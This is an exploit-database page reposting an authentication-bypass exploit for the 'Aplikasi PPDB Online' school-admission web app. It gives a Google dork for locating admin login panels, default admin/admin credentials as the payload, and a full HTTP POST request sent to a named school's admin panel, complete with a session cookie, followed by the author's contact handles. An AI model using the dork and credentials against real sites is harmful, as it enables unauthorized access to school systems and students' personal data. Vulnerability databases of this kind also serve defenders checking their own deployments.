Advertisement






Aplikasi PPDB Online - Default Admin Login Credentials

CVE Category Price Severity
N/A CWE-287: Improper Authentication N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-30
CPE
cpe:cpe:/a:aplikasi:ppdb_online:1.0.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010201

Below is a copy:

Aplikasi PPDB Online - Default Admin Login Credentials
#############################################################
# Exploit Title: Aplikasi PPDB Online - Default Admin Login Credentials
# Google Dork: intitle:"Halaman Login" inurl:/panel_admin/log_in
# Date: 2021-1-30
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: gst-dev.net
# Software Version: ppdb_2021
# Software Link: http://gst-dev.net/#services
# Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux

#############################################################
[*] Information:

GST - Dev is a website that provides instant school website creation services. Here, you can create your own website without requiring expertise in web design and programming. All you do is fill in the form provided, choose a design theme, then within 3 days, your school website will go straight online.

#############################################################
[*] Exploit:

{
"username":"admin",
"password":"admin",
"btnlogin":""
}

#############################################################
[*] Demo:
=
https://pcpdb.sanclar-mc.sch.id/kbk/panel_admin/log_in

POST /kbk/panel_admin/log_in HTTP/1.1
Host: pcpdb.sanclar-mc.sch.id
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://pcpdb.sanclar-mc.sch.id
DNT: 1
Connection: keep-alive
Referer: https://pcpdb.sanclar-mc.sch.id/kbk/panel_admin/log_in
Cookie: ci_session=r2g5bpb7tqpouf3aqs0r1lcs1r06q6i5
Upgrade-Insecure-Requests: 1
{"username":"admin","password":"admin","btnlogin":""}

#############################################################
[*] Contact:

# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_.py
# Twitter: twitter.com/Gh05t666nero1
# E-mail: [email protected]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum